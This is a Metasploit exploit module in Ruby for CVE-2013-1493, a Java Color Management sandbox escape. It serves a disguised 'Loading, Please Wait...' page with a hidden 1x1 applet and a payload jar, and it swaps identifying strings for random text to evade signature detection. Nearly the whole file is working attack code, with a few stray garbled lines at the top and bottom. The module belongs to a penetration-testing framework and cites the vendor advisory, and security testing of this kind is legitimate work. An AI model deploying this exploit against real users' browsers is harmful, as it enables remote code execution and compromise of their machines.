##
5 U- ~* B& P G4 n3 u) t
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
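# Browser-delivered module for CVE-2013-1493 (Java Color Management classes).
#
# The module runs an HTTP server that answers three kinds of request:
#   * a URI ending in "/"    -> an HTML page embedding a 1x1 <applet>
#   * a URI ending in ".jar" -> a jar holding the payload plus four pre-built
#                               class files read from the framework data dir
#   * anything else          -> a redirect to the resource path plus "/"
#
# Scope, as stated in the module description: Java 7u15 and earlier and 6u41
# and earlier; click-to-play is not bypassed, so the applet only runs after
# the user accepts the Java warning. The Oracle alert listed under
# 'References' is the vendor advisory for this CVE.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The served page uses a plain <applet> tag, so no JavaScript is required.
  autopwn_info({ :javascript => false })

  # Registers the module metadata (name, references, targets, payload limits).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'Java CMM Remote Code Execution',
      'Description'   => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'    =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'      => [ 'win', 'java' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      # Index into 'Targets': 1 selects the Windows x86 native-payload entry.
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four pre-built class files into memory before the server starts
  # and picks a random replacement for the "Init" class name.
  def setup
    @init_class           = read_class_file("Init.class")
    @leak_class           = read_class_file("Leak.class")
    @buffered_image_class = read_class_file("MyBufferedImage.class")
    @color_space_class    = read_class_file("MyColorSpace.class")

    # The replacement has the same length as "Init"; presumably this keeps the
    # byte layout of the compiled class unchanged by the in-place substitution.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)
    super
  end

  # Dispatches each HTTP request on the shape of its URI.
  #
  # @param cli the client connection handed over by the HTTP server mixin
  # @param request the parsed HTTP request; only request.uri is read here
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Replace the literal "metasploit" and "Payload" strings in every entry
      # name and body with random text of the same length. The Leak,
      # MyBufferedImage and MyColorSpace entry names contain neither string,
      # so those three names are identical in every jar this module serves.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str    = rand_text_alpha("payload".length)
      jar.entries.each do |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      end
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # A separate local name avoids shadowing the module's `payload` accessor,
      # which the .jar branch above calls.
      regenerated = regenerate_payload(cli)
      unless regenerated
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      # Any other path is steered to the landing page.
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Builds the landing page: a "Loading" message plus a 1x1 <applet> whose
  # archive is a random eight-letter .jar name and whose code attribute is the
  # randomised Init class name chosen in #setup.
  #
  # @return [String] the HTML document, with no line breaks between fragments
  def generate_html
    [
      %Q|<html><head><title>Loading, Please Wait...</title></head>|,
      %Q|<body><center><p>Loading, Please Wait...</p></center>|,
      %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|,
      %Q|</applet></body></html>|
    ].join
  end

  private

  # Reads one pre-built class file from data/exploits/cve-2013-1493 under the
  # framework install root.
  #
  # @param name [String] file name inside that directory
  # @return [String] the raw bytes of the file
  def read_class_file(name)
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", name)
    File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
  end
end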
! ^: i. i2 k- Q" [3 D# A* ^ |